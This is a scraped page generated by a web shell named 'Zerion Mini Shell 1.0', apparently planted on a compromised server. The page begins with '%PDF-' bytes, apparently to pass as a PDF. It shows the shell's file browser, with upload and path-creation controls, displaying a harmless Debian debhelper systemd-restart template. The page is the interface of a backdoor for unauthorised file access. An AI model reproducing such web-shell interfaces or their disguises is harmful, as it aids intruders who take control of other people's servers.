%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/share/debhelper/autoscripts/
Upload File :
Create Path :
Current File : //usr/share/debhelper/autoscripts/postinst-systemd-restart

if [ "$1" = "configure" ] || [ "$1" = "abort-upgrade" ] || [ "$1" = "abort-deconfigure" ] || [ "$1" = "abort-remove" ] ; then
	if [ -d /run/systemd/system ]; then
		systemctl --system daemon-reload >/dev/null || true
		if [ -n "$2" ]; then
			_dh_action=#RESTART_ACTION#
		else
			_dh_action=start
		fi
		deb-systemd-invoke $_dh_action #UNITFILES# >/dev/null || true
	fi
fi

Zerion Mini Shell 1.0